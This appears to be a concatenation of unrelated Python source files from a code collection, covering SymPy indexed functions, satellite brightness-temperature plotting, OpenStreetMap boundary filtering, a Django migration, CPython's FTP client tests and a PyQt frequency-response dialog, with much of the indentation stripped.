elif isinstance(wrt, IndexedFunc.IndexedFuncValue) and wrt.base == self.base:
if len(self.indices) != len(wrt.indices):
msg = "Different # of indices: d({!s})/d({!s})".format(self,
wrt)
raise IndexException(msg)
elif self.functional_form != wrt.functional_form:
msg = "Different function form d({!s})/d({!s})".format(self.functional_form,
wrt.functional_form)
raise IndexException(msg)
result = S.One
for index1, index2 in zip(self.indices, wrt.indices):
result *= KroneckerDelta(index1, index2)
return result
else:
# f(x).diff(s) -> x.diff(s) * f.fdiff(1)(s)
i = 0
l = []
funcof = self._get_iter_func()
for a in funcof:
i += 1
da = a.diff(wrt)
if da is S.Zero:
continue
df = self._get_df(a, wrt)
l.append(df * da)
return Add(*l)
@property
def free_symbols(self):
return super(IndexedFunc.IndexedFuncValue, self).free_symbols.union(*[
set([x]) if not isinstance(x, IndexedFunc.IndexedFuncValue) else
x.free_symbols for x in self._get_iter_func()]).union(
[self])
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return self._get_subclass(self,
self.functional_form,
*indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return self._get_subclass(self,
self.functional_form,
indices, **kw_args)
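if __name__ == '__main__':
    # A minimal, hedged demonstration of the classes above, assuming a SymPy release
    # in which this module's legacy imports (e.g. sympy.core.compatibility) still
    # resolve. The names below are illustrative.
    t = Symbol('t')
    i = Idx('i')
    temperature = IndexedFunc('T', t)   # an indexed quantity T[i] that depends on t
    print(temperature[i].diff(t))       # chain rule: (dT/dt)[i]
    x = ImplicitSymbol('x', t)          # x = x(t)
    f = ImplicitSymbol('f', x)          # f = f(x(t))
    print(f.diff(t))                    # (df/dx) * (dx/dt)
    # Differentiating one indexed value with respect to another of the same base is
    # defined above to produce KroneckerDelta factors over the paired indices.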
|
derivations/scripts/sympy_addons.py
|
| 0.752468 | 0.216881 |
import pandas as pd
import h5py
import numpy as np
import os
import matplotlib.pyplot as plt
#load csdb
new_file = h5py.File("../data/csdb_bt/csdb_bt.h5", "r")
bt_csdb = new_file["bt"][:]
new_file.close()
#compute mean and var csdb dataset
df_bt_csdb = pd.DataFrame(bt_csdb)
mean_bt_csdb = df_bt_csdb.mean()
var_bt_csdb = df_bt_csdb.var()
directory = "../data/mipas_blabeled_2009/2009_bt"
files = [i for i in os.listdir(directory)]
bt_mipas_tot = np.empty([0, 142])
for file in files:
#load mipas df
bt_mipas = np.empty([0, 142])
new_file = h5py.File(os.path.join(directory, file), "r")
bt_mipas = new_file["bt"][:]
new_file.close()
bt_mipas_tot = np.vstack([bt_mipas_tot, bt_mipas])
df_bt_mipas = pd.DataFrame(bt_mipas_tot)
mean_bt_mipas = df_bt_mipas.mean()
var_bt_mipas = df_bt_mipas.var()
#plotting variance
my_path = "../progetti/bt_mean_var/"
if not os.path.exists(my_path):
os.makedirs(my_path)
my_file = "var_bt" + ".png"
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax1.plot(np.arange(0,142), var_bt_mipas, label = "mipas")
ax1.plot(np.arange(0,142), var_bt_csdb, label = "csdb")
loc = [84, 99, 107, 113, 125, 131, 137]
new_tick_locations = np.array(loc)
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
transition = ["t1", "t2", "t3", "t4", "t5", "t6", "t7"]
ax2.set_xticklabels(transition)
ax2.set_xlabel("transition")
title = ax2.set_title("Variance: BT")
title.set_y(1.1)
fig.subplots_adjust(top=0.85)
ax1.legend()
for tr in loc:
ax1.axvline(tr, linewidth = 1, color = 'k')
ax1.set_ylabel("var")
ax1.set_xlabel("BT")
fig.savefig(os.path.join(my_path, my_file))
plt.close()
#plotting mean
my_file = "mean_bt" + ".png"
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax1.plot(np.arange(0,142), mean_bt_mipas, label = "mipas")
ax1.plot(np.arange(0,142), mean_bt_csdb, label = "csdb")
new_tick_locations = np.array(loc)
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
ax2.set_xticklabels(transition)
ax2.set_xlabel("transition")
title = ax2.set_title("Mean: BT")
title.set_y(1.1)
fig.subplots_adjust(top=0.85)
ax1.legend()
for tr in loc:
ax1.axvline(tr, linewidth = 1, color = 'k')
ax1.set_ylabel("mean")
ax1.set_xlabel("BT")
fig.savefig(os.path.join(my_path, my_file))
plt.close()
"""
#btd
new_file = h5py.File("../data/csdb_new/csdb_complete.h5", "r")
btd_csdb = new_file["btd_complete"][:]
new_file.close()
df_btd_csdb = pd.DataFrame(btd_csdb)
mean_btd_csdb = df_btd_csdb.mean()
var_btd_csdb = df_btd_csdb.var()
directory = "../data/mipas_pd"
files = [i for i in os.listdir(directory)]
files = files[19:24]
df_btd_mipas_complete = pd.DataFrame()
for file in files:
#load mipas df
df_btd_mipas = pd.read_hdf(os.path.join(directory, file),'df_btd')
df_btd_mipas_complete = df_btd_mipas_complete.append(df_btd_mipas)
mean_btd_mipas = df_btd_mipas.iloc[:, 0:10011].mean()
var_btd_mipas = df_btd_mipas.iloc[:, 0:10011].var()
plt.plot(np.arange(0,10011), var_btd_mipas, label = "mipas")
plt.plot(np.arange(0,10011), var_btd_csdb, label = "csdb")
"""
|
code/mean_var_bt.py
|
| 0.178204 | 0.103749 |
from pyrosm.data_manager import get_osm_data
from pyrosm.frames import prepare_geodataframe
from pyrosm.utils import validate_custom_filter
import geopandas as gpd
import warnings
def get_boundary_data(node_coordinates, way_records, relations,
tags_as_columns, custom_filter,
boundary_type, name, bounding_box):
if boundary_type == "all":
boundary_type = True
else:
boundary_type = [boundary_type]
# If custom_filter has not been defined, initialize with default
if custom_filter is None:
custom_filter = {"boundary": boundary_type}
if "boundary" not in custom_filter.keys():
custom_filter["boundary"] = True
# Check that the custom filter is in correct format
custom_filter = validate_custom_filter(custom_filter)
# Call signature for fetching buildings
nodes, ways, relation_ways, relations = get_osm_data(node_arrays=None,
way_records=way_records,
relations=relations,
tags_as_columns=tags_as_columns,
data_filter=custom_filter,
filter_type="keep",
osm_keys=None
)
    # If no data were found, warn and return None
if nodes is None and ways is None and relations is None:
warnings.warn("Could not find any boundaries for given area.",
UserWarning,
stacklevel=2)
return None
# Prepare GeoDataFrame
gdf = prepare_geodataframe(nodes, node_coordinates, ways,
relations, relation_ways,
tags_as_columns, bounding_box)
if gdf is None:
return None
# Filter by name
# (use Pandas for filtering, which allows using 'contains' more easily)
if name is not None:
if "name" not in gdf.columns:
            raise ValueError("Could not filter by name from given area. "
                             "None of the OSM elements had a name tag.")
gdf = gdf.dropna(subset=["name"])
gdf = gdf.loc[gdf["name"].str.contains(name)].reset_index(drop=True).copy()
return gdf
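# A hedged usage sketch: this helper is normally reached through pyrosm's public
# OSM wrapper rather than called directly. Assuming a recent pyrosm release and a
# local PBF extract (file name illustrative):
#
#   from pyrosm import OSM
#   osm = OSM("helsinki.osm.pbf")
#   admin = osm.get_boundaries(boundary_type="administrative", name="Helsinki")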
|
pyrosm/boundary.py
|
| 0.734405 | 0.23688 |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Address.extended_address'
db.add_column(u'address_address', 'extended_address',
self.gf('django.db.models.fields.CharField')(default='', max_length=35, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Address.extended_address'
db.delete_column(u'address_address', 'extended_address')
models = {
u'address.address': {
'Meta': {'ordering': "('locality', 'street_address')", 'object_name': 'Address'},
'extended_address': ('django.db.models.fields.CharField', [], {'max_length': '35', 'blank': 'True'}),
'formatted': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'addresses'", 'to': u"orm['address.Locality']"}),
'longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'street_address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'address.country': {
'Meta': {'ordering': "('name',)", 'object_name': 'Country'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'blank': 'True'})
},
u'address.locality': {
'Meta': {'ordering': "('state', 'postal_code', 'name')", 'unique_together': "(('name', 'state', 'postal_code'),)", 'object_name': 'Locality'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('address.models.NullCharField', [], {'max_length': '165', 'null': 'True', 'blank': 'True'}),
'postal_code': ('address.models.NullCharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'localities'", 'to': u"orm['address.State']"})
},
u'address.state': {
'Meta': {'ordering': "('country', 'code', 'name')", 'unique_together': "(('name', 'code', 'country'),)", 'object_name': 'State'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'states'", 'to': u"orm['address.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '165', 'blank': 'True'})
}
}
complete_apps = ['address']
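# A hedged note on applying this South migration; the app label and migration
# prefix below come from this file's location and name and may differ per project.
#
#   python manage.py migrate address 0004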
|
address/migrations/0004_auto__add_field_address_extended_address__chg_field_address_street_add.py
|
| 0.443118 | 0.147986 |
# Modified by <NAME>' to test FTP class and IPv6 environment
import ftplib
import threading
import asyncore
import asynchat
import socket
import StringIO
from unittest import TestCase
from test import test_support
from test.test_support import HOST
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
self.baseclass.push('226 transfer complete')
self.close()
class DummyFTPHandler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
self.dtp.push(RETR_DATA)
self.dtp.close_when_done()
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 1<PASSWORD>'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
Lib/test/test_ftplib.py
|
| 0.480479 | 0.143518 |
from PyQt5.QtWidgets import QLineEdit, QDialog, QFileDialog, QWidget, QTreeWidget, QToolButton, QRadioButton, QMessageBox, QTreeWidgetItem, QTabWidget, QLabel, QCheckBox, QPushButton, QSpinBox
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtGui import QColor, QBrush
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
import os
import matplotlib.pyplot as plt
import numpy as np
from pulse.postprocessing.plot_structural_data import get_structural_frf
from data.user_input.project.printMessageInput import PrintMessageInput
window_title1 = "ERROR MESSAGE"
window_title2 = "WARNING MESSAGE"
class SnaptoCursor(object):
def __init__(self, ax, x, y, show_cursor):
self.ax = ax
self.x = x
self.y = y
self.show_cursor = show_cursor
if show_cursor:
self.vl = self.ax.axvline(x=np.min(x), ymin=np.min(y), color='k', alpha=0.3, label='_nolegend_') # the vertical line
self.hl = self.ax.axhline(color='k', alpha=0.3, label='_nolegend_') # the horizontal line
self.marker, = ax.plot(x[0], y[0], markersize=4, marker="s", color=[0,0,0], zorder=3)
# self.marker.set_label("x: %1.2f // y: %4.2e" % (self.x[0], self.y[0]))
# plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
def mouse_move(self, event):
if self.show_cursor:
if not event.inaxes: return
x, y = event.xdata, event.ydata
if x>=np.max(self.x): return
indx = np.searchsorted(self.x, [x])[0]
x = self.x[indx]
y = self.y[indx]
self.vl.set_xdata(x)
self.hl.set_ydata(y)
self.marker.set_data([x],[y])
self.marker.set_label("x: %1.2f // y: %4.2e" % (x, y))
plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
self.ax.figure.canvas.draw_idle()
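# A minimal sketch of how SnaptoCursor can be wired to a standalone Matplotlib
# figure; the data below is illustrative.
#
#   fig, ax = plt.subplots()
#   x = np.linspace(0, 10, 200)
#   y = np.sin(x)
#   ax.plot(x, y)
#   cursor = SnaptoCursor(ax, x, y, show_cursor=True)
#   fig.canvas.mpl_connect('motion_notify_event', cursor.mouse_move)
#   plt.show()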
class PlotStructuralFrequencyResponseInput(QDialog):
def __init__(self, project, opv, analysisMethod, frequencies, solution, *args, **kwargs):
super().__init__(*args, **kwargs)
uic.loadUi('data/user_input/ui/Plots/Results/Structural/plotStructuralFrequencyResponseInput.ui', self)
icons_path = 'data\\icons\\'
self.icon = QIcon(icons_path + 'pulse.png')
self.setWindowIcon(self.icon)
self.setWindowFlags(Qt.WindowStaysOnTopHint)
self.setWindowModality(Qt.WindowModal)
self.opv = opv
self.opv.setInputObject(self)
self.list_node_IDs = self.opv.getListPickedPoints()
self.projec = project
self.preprocessor = project.preprocessor
self.before_run = self.preprocessor.get_model_checks()
self.nodes = self.preprocessor.nodes
self.analysisMethod = analysisMethod
self.frequencies = frequencies
self.solution = solution
self.userPath = os.path.expanduser('~')
self.save_path = ""
self.node_ID = 0
self.imported_data = None
self.localDof = None
self.lineEdit_nodeID = self.findChild(QLineEdit, 'lineEdit_nodeID')
self.lineEdit_FileName = self.findChild(QLineEdit, 'lineEdit_FileName')
self.lineEdit_ImportResultsPath = self.findChild(QLineEdit, 'lineEdit_ImportResultsPath')
self.lineEdit_SaveResultsPath = self.findChild(QLineEdit, 'lineEdit_SaveResultsPath')
self.toolButton_ChooseFolderImport = self.findChild(QToolButton, 'toolButton_ChooseFolderImport')
self.toolButton_ChooseFolderImport.clicked.connect(self.choose_path_import_results)
self.toolButton_ChooseFolderExport = self.findChild(QToolButton, 'toolButton_ChooseFolderExport')
self.toolButton_ChooseFolderExport.clicked.connect(self.choose_path_export_results)
self.toolButton_ExportResults = self.findChild(QToolButton, 'toolButton_ExportResults')
self.toolButton_ExportResults.clicked.connect(self.ExportResults)
self.toolButton_ResetPlot = self.findChild(QToolButton, 'toolButton_ResetPlot')
self.toolButton_ResetPlot.clicked.connect(self.reset_imported_data)
self.lineEdit_skiprows = self.findChild(QSpinBox, 'spinBox')
self.checkBox_cursor = self.findChild(QCheckBox, 'checkBox_cursor')
self.cursor = self.checkBox_cursor.isChecked()
self.checkBox_cursor.clicked.connect(self.update_cursor)
self.radioButton_ux = self.findChild(QRadioButton, 'radioButton_ux')
self.radioButton_uy = self.findChild(QRadioButton, 'radioButton_uy')
self.radioButton_uz = self.findChild(QRadioButton, 'radioButton_uz')
self.radioButton_rx = self.findChild(QRadioButton, 'radioButton_rx')
self.radioButton_ry = self.findChild(QRadioButton, 'radioButton_ry')
self.radioButton_rz = self.findChild(QRadioButton, 'radioButton_rz')
self.Ux = self.radioButton_ux.isChecked()
self.Uy = self.radioButton_uy.isChecked()
self.Uz = self.radioButton_uz.isChecked()
self.Rx = self.radioButton_rx.isChecked()
self.Ry = self.radioButton_ry.isChecked()
self.Rz = self.radioButton_rz.isChecked()
self.radioButton_plotAbs = self.findChild(QRadioButton, 'radioButton_plotAbs')
self.radioButton_plotReal = self.findChild(QRadioButton, 'radioButton_plotReal')
self.radioButton_plotImag = self.findChild(QRadioButton, 'radioButton_plotImag')
self.radioButton_plotAbs.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotReal.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotImag.clicked.connect(self.radioButtonEvent_YAxis)
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
self.radioButton_Absolute = self.findChild(QRadioButton, 'radioButton_Absolute')
self.radioButton_Real_Imaginary = self.findChild(QRadioButton, 'radioButton_Real_Imaginary')
self.radioButton_Absolute.clicked.connect(self.radioButtonEvent_save_data)
self.radioButton_Real_Imaginary.clicked.connect(self.radioButtonEvent_save_data)
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
self.radioButton_NoneDiff = self.findChild(QRadioButton, 'radioButton_NoneDiff')
self.radioButton_SingleDiff = self.findChild(QRadioButton, 'radioButton_SingleDiff')
self.radioButton_DoubleDiff = self.findChild(QRadioButton, 'radioButton_DoubleDiff')
self.radioButton_NoneDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_SingleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_DoubleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
self.tabWidget_plot_results = self.findChild(QTabWidget, "tabWidget_plot_results")
self.tab_plot = self.tabWidget_plot_results.findChild(QWidget, "tab_plot")
self.pushButton_AddImportedPlot = self.findChild(QPushButton, 'pushButton_AddImportedPlot')
self.pushButton_AddImportedPlot.clicked.connect(self.ImportResults)
self.pushButton = self.findChild(QPushButton, 'pushButton')
self.pushButton.clicked.connect(self.check)
self.writeNodes(self.list_node_IDs)
self.exec_()
def update_cursor(self):
self.cursor = self.checkBox_cursor.isChecked()
def reset_imported_data(self):
self.imported_data = None
title = "Information"
        message = "The plot data has been reset."
PrintMessageInput([title, message, window_title2])
def writeNodes(self, list_node_ids):
text = ""
for node in list_node_ids:
text += "{}, ".format(node)
self.lineEdit_nodeID.setText(text)
def update(self):
self.list_node_IDs = self.opv.getListPickedPoints()
if self.list_node_IDs != []:
self.writeNodes(self.list_node_IDs)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.check()
elif event.key() == Qt.Key_Escape:
self.close()
def radioButtonEvent_YAxis(self):
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
def radioButtonEvent_save_data(self):
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
def radioButtonEvent_modify_spectrum(self):
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
